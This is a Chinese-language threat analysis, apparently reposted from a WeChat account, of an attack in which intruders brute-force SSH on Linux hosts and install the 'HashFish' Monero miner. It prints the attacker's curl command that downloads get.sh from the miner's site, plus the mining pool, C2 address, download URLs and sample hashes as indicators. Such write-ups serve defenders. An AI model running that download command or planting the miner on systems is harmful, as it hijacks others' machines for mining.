哈鱼矿工攻击事件分析

一、背景

近期观测到Linux下挖矿攻击事件攻击者通过SSH爆破获得权限后下载哈鱼矿工进行挖矿对该样本进行深入分析 哈鱼矿工是一款专门为对区块链不了解的小白用户设计的挖矿软件通过电脑的CPU和GPU计算获得虚拟货币并统一换算成比特币用户可以将挖矿收益提现到支付宝或者选择提币到比特币钱包。

目前哈鱼矿工支持CryptoNight和Ethash算法可用于挖门罗以太坊等主流加密货币此外哈鱼矿工已率先支持门罗币新PoW算法届时将自动无缝切换到新算法无需人工干预。

二、样本介绍

样本基本信息：

样本	MD5	内容
get.sh	1f17b8602739864fe6f78d34330d9537	脚本下载哈鱼挖矿程序
hashfish	ac74da8ea28bf2146b069e4d44d44ae0	64位挖矿管理程序
hfxminer64	337d30665c902246c45dc8c7a5d2dd4b	64位挖矿程序

三、详细分析

攻击者通过SSH爆破后执行curl http://cli.hashfish.net/get.sh-o get.sh下载get.sh脚本脚本内容如下所示主要作用是根据系统版本下载对应的哈鱼挖矿程序包并且执行挖矿程序其中phone表示挖矿用户mode为模式。

通过在测试环境中执行脚本分析发现攻击者用户名为ph_r190HVKESk13exg=矿池为cn4.hfsvr.com:19891进行门罗币挖矿。

哈鱼的挖矿进行名hfxminer64下面为进程状态。

可以发现平均每秒可以执行三十几次hash运算。

三、相关IOC

MD5

1f17b8602739864fe6f78d34330d9537
ac74da8ea28bf2146b069e4d44d44ae0
337d30665c902246c45dc8c7a5d2dd4b

C2

42.88.44.188:6974

URL

http://cli.hashfish.net/get.sh
http://cli.hashfish.net/linux.tar.gz
http://cli.hashfish.net/darwin.tar.gz

附：其他平台检测结果：

微步分析结果可以发现微步还不认为该挖矿样本为恶意程序

Virustotal检测结果：

本文始发于微信公众号（疯猫网络）：哈鱼矿工攻击事件分析